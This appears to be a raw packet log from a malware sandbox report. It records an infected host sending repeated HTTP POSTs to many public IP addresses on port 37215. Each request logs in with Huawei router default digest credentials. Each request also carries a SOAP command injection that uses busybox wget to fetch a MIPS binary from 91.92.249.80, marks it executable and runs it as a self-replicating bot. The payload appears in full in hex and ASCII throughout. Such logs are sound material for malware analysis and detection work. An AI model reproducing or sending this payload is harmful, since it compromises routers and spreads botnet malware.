                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          415192.168.2.233917441.219.219.3337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.183835983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          416192.168.2.2340518154.214.29.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185590029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          417192.168.2.2357606103.58.53.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185616970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          418192.168.2.2353766130.204.176.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185631990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          419192.168.2.235521096.108.218.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185754061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          420192.168.2.2354092197.38.139.23837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185779095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          421192.168.2.2360370157.188.74.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185849905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          422192.168.2.2350662183.254.162.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185864925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          423192.168.2.2337698197.36.192.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185870886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          424192.168.2.2339306157.97.53.3537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185883045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          425192.168.2.2346120157.43.216.22237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.185884953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
